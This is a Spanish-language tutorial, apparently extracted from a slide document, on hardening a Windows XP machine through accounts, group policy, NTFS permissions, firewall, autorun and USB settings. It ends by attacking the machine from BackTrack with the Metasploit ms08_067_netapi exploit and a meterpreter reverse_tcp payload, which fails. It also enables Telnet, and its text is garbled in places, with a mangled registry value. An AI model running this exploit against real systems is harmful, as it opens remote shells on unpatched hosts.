windows indestructible atacado con backtrak

8/7/2019 Windows Indestructible Atacado Con Backtrak

1/38

Windows indestructible atacado con Backtrak, su evaluacin y

Proteccin.

Como primer paso procedemos a la verificacin del Service Pack que se encuentrainstalado en la maquina.

A continuacin comenzamos a instalar las nuevas actualizaciones desde el Windows

Update(para esto damos click en: inicio, todos los programas, Windows Update).

Nos aparecer la siguiente ventana


2/38

En este momento procedemos hace la configuracin para hacer el

Windows indestructible

1.- Configuracin de usuarios

Click derecho en MI PC

Administrar

Administracin del equipo (local)

Herramienta del sistema

Usuarios locales y grupoUsuarios


3/38

La cuenta Administrador debe cambiar el nombre y poner contrasea y la cuenta que es

usuario debe ser tipo Usuarios


4/38

Ahora procedemos al usuario cambiarle el tipo de cuenta, hay que ponerle tipo Usuarios

Eliminamos Tipo Administradores y agregamos tipo Usuarios, Aplicar y Aceptar


5/38


6/38

Cambiar el modo de inicio de sesin:

Abrir Panel de Control

Cuentas de Usuarios

Cambiar forma en que los Usuarios inician sesin


7/38

Desmarcar las 2 opciones

Presionar Aplicar opciones

Impedir mostrar el ultimo usuario que utilizo la mquina

Inicio

Ejecutar

Escribir gpedit.msc

EscogerDirectiva Equipo Local

Configuracin del equipoConfiguracin de Windows

Configuracin de Seguridad

Directivas localesOpciones de seguridad

Buscamos : Inicio de sesin interactivo: no mostrar el ultimo nombre de usuarioClick derecho Propiedades

Marcamos Habilitado, Aplicar y Aceptar


8/38


9/38

Para mostrar un mensaje al intentar iniciar sesin

InicioEjecutar

Escribir gpedit.mscEscogerDirectiva Equipo Local

Configuracin del equipo

Configuracin de WindowsConfiguracin de SeguridadDirectivas locales

Opciones de seguridad

Buscamos : Inicio de sesin interactivo: texto del mensaje para los usuarios que intentan

iniciar sesin

Click derecho Propiedades

Escribimos el mensaje, Aplicar y Aceptar

Bloqueo de cuentasInicio

Ejecutar

Escribir gpedit.msc

EscogerDirectiva Equipo Local

Configuracin del equipoConfiguracin de Windows

Configuracin de SeguridadDirectivas de Cuenta

Directivas de contraseas .- donde hay opciones para restringir la seguridad en una

contrasea


10/38

Directivas de bloqueo de cuentas .- permite bloquear la cuenta segn las Directivas de

contraseas


11/38

Al cerrar nos quedar algo como esto:

2. Administrar los permisos NTFSAbrir Mi PC

Seleccionar Opciones de carpetaEn la pestaa Ver

Desmarcar Utilizar uso compartido simple de archivos (recomendado)


12/38

Click derecho en la unidad C:Compartir y Seguridad

Nuevo recurso compartidoEscribir el nombre del Recurso

Presionar Permisos


13/38


14/38

Presionar AgregarEscribir el nombre de Usuario y Comprobar nombres, Aceptar


15/38

Vamos a la pestaa Seguridad


16/38

Solo tenemos q tener sealadas las pestaas q se muestran:

Damos click en Opciones avanzadas


17/38

Modificamos todo lo de Usuarios para que NO puedan escribir, NO puedan crear

carpetas, NO puedan crear archivos, NO puedan borrar, SOLO leer.Aplicar y Aceptar

Ahora compartir la carpeta Administrador para que lo puedan ver los dems usuarios


18/38

Presionamos el botn Permisos


19/38

Presionamos Agregar

Escribimos el nombre Usuarios y Comprobamos nombres, Aceptar


20/38

Vamos a la pestaa SeguridadRealizamos los mismos pasos que hicimos en para compartir el disco duro en esta

pestaa

Estamos en el usuario y queremos escribir algo o crear carpetas y NO podemos, SOLO

se puede dentro de la carpeta del usuario.

4. Activacin de la Actualizaciones de WindowsInicio

EjecutarEscribir sysdm.cpl

Clic en Actualizaciones Automticas

Se recomienda seleccione:

Automtico (recomendado) Descargar automticamente las actualizaciones

recomendadas para mi equipo e instalarlas.

El tiempo de ejecucin lo puedo elegir desde una pestaa desplegable.

Si se elige esta opcin Windows reconoce si est conectado y utiliza la conexin

a Internet para buscar las actualizaciones en Windows Update Web; se actualiza

de fondo y en el proceso no se notifica ni interrumpe, slo aparece un icono en el

rea de notificacin de la barra de tareas cuando las actualizaciones se estn

descargando.


21/38

Pero existe tambin 2 opciones ms que se pueden elegir: Descargar actualizaciones por m, pero permitirme elegir cuando instalarlas

Si se elige esta opcin Windows reconoce si est conectado y utiliza la conexina Internet para buscar las actualizaciones en Windows Update Web; en el

proceso no se notifica ni interrumpe, slo aparece un icono en el rea de

notificacin de la barra de tareas cuando las actualizaciones se estn

descargando.

Una vez que finaliza la descarga aparece una notificacin de que ha finalizado la

descarga, y se pueden revisar las actualizaciones.

Notificar pero no descargar o instalarlas automticamente

Si se elige esta opcin Windows reconoce si est conectado y utiliza la conexin

a Internet para buscar las actualizaciones en Windows Update Web; y aparece en

el icono en el rea de notificacin de la barra de tareas que hay actualizaciones

disponibles para descragar e instalar.

Una vez elegido el tipo de Actualizacin, Aplicar y Aceptar


22/38

5. Configuracin Firewall de Windows

Inicio

Panel de Control

Firewall o tambin Centro de Seguridad, Firewall

En la pestaa General tenemos:

- Si queremos elegir un Firewall sin excepciones solo elegimos:

Activado (recomendado)

No permitir excepciones

Aceptar


23/38

- Si queremos un Firewall con excepciones

Activado (recomendado)Y la casilla No permitir excepciones, debe estar desmarcada

Aceptar

En la pestaa Excepciones marcar: Mostrar una notificacin cada vez que Firewall de

Windows bloquee un programa.


24/38

Tambin en esta pestaa cuando queremos un Firewall con excepciones podemos

escoger los programas a los que se les dar permiso, si el programa no se encuentra enla lista lo podemos escoger de la siguiente manera:

Click en Agregar programa

Si el programa no se encuentra en la lista damos click en ExaminarY buscamos el programa, Aceptar

Una parte opcional es: Cambiar mbito

Esta opcin nos permite especificar los equipos que queremos que utilicen el programaexceptuado en mi equipo.


25/38

Otra opcin en la pestaa Excepciones es una Excepcin de puertos, y para estorealizamos lo siguiente:

Click en Agregar puertoPodemos escribir el Nombre del puerto y el Nmero del puerto

Despus Aceptar y est configurado el Firewall con excepciones.

6. Activacin y desactivacin de Servicios y Protocolos

Para Activar y desactivar los serviciosNos vamos a Panel de Control

Herramientas administrativas

Servicios

Ah podeos escoger el servicio que deseamos activarlo o desactivarlo


26/38

En este caso vamos activar el Servicio de Telnet


27/38

Y damos clip en Iniciar y se va activar el servicio


28/38

7. Desactivar el autorun

InicioEjecutar

Escribimos gpedit.mscEn el rbol: Directiva de equipo local >Configuracin del equipo > Plantillas

administrativas > Sistema

Escoger en la ventana de la derecha: Desactivar reproduccin automticaClick derecho, Propiedades

Escoger Habilitar y elegir en Desactivar reproduccin automtica en: Todas las

unidades

Aplicar, Aceptar


29/38

Para que no puedan detectar los pendrive USBInicio

EjecutarRegedit

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor

Start=dword:000000033 = Activado4 = Desactivado

8. Instalacin y configuracin de Anti-virus

Descargamos el anti-virus AVG

Lo instalamos siguiendo el ayudante de instalacin


30/38


31/38


32/38

9. Navegador web con filtro de phishing

Para tener este filtro utilizamos el SmartScreen de Internet Explorer 8 (IE8), que es unaherramienta anti-phishing llamada as en el Internet Explorer 7.

Phishing

Es un tipo de delito dentro del mbito de las estafas informticas caracterizado porintentar adquirir informacin confidencial de forma fraudulenta por ejemplo una

contrasea, informacin detallada sobre tarjeta de crdito u otra informacin bancaria,

datos personales, es decir se realiza el robo de identidad.

SmartScreen como acta

Si un usuario visita un sitio que ha sido etiquetado como fraudulento o contiene

software malicioso, entonces IE8 mostrar un aviso de eso recomendando que el sitio

no deba ser visitado.Tambin revisa los enlaces de descarga de archivos para evitar la instalacin o

ejecucin de archivos provenientes de sitios peligrosos.

Mantener activo el filtro

Inicio

EjecutarEscribir gpedit.msc

Directiva Equipo local


33/38

Configuracin de usuario

Plantillas administrativasComponentes de Windows

Internet ExplorerEn el rbol derecho escogemos: Desactivar la administracin del filtro SmartScreen

PropiedadesEscoger Habilitada y elegir en Seleccionar modo de filtro SmartScreen: Activar


34/38

Dentro de la carpeta Internet Explorer

Panel de Control de InternetEn el rbol derecho escogemos: Deshabilitar la pgina de Seguridad

Propiedades

Escoger Habilitada, Aplicar y Aceptar


35/38

Vemos que l s opciones esaparecen y no se pueden modi icar

10. Acti seguri de registro de Wi dows

------ Para impedir que el usuario cambie la hora del sistema

Inicio

Ejecutar

Escribir gpedit msc

irecti a Equipo local

Configuraci n del equipo

Configuraci n de Windows

Configuraci n de seguridad

irecti as locales

Asignaci n de derechos de autor

En el rbol derecho escogemos:Cambiarla hora del sistema


36/38

Propiedades

Solo debe estar Administradores, si existe otro grupo lo quitamos, as como tambin

podemos agregar un determinado grupo

Aplicar. Aceptar


37/38

Realizacin de ataque informtico con Backtrak 4

En el Shell de backtrak escribimos

1. /pentest/exploits/framework32.

./msfconsole

Este es el entorno visual del programa ahora, vamos a llamar al exploit que utilizaremos:

use exploit/windows/smb/ms08_067_netapi.

Procedemos a escribir los comandos Lhost I

PATACANTE Ejemplo Lhost 192.16.1.4 y

Rhost IP VICTIMA Ejemplo Rhost 192.16.1.3.

seleccionamos el payload:

set PAYLOAD windows/meterpreter/reverse_tcp

ahora ejecutamos el exploit:

exploit

Al poco tiempo veremos si nos hemos conectado a la victima:

En este caso no se pudo realizar el ataque ya que al correr el exploit manda el mensaje que

no fue creada la sesin exploit completed but no sessin was createdy cumplimos con

nuestro objetivo de proteger el Windows.


38/38

Si se hubiera creado la sesin nos aparecera el mensaje meterpreter sesin 1

opened.osea que la sesin fue creada como nos muestra en la siguiente figura.

windows indestructible atacado con backtrak

Documents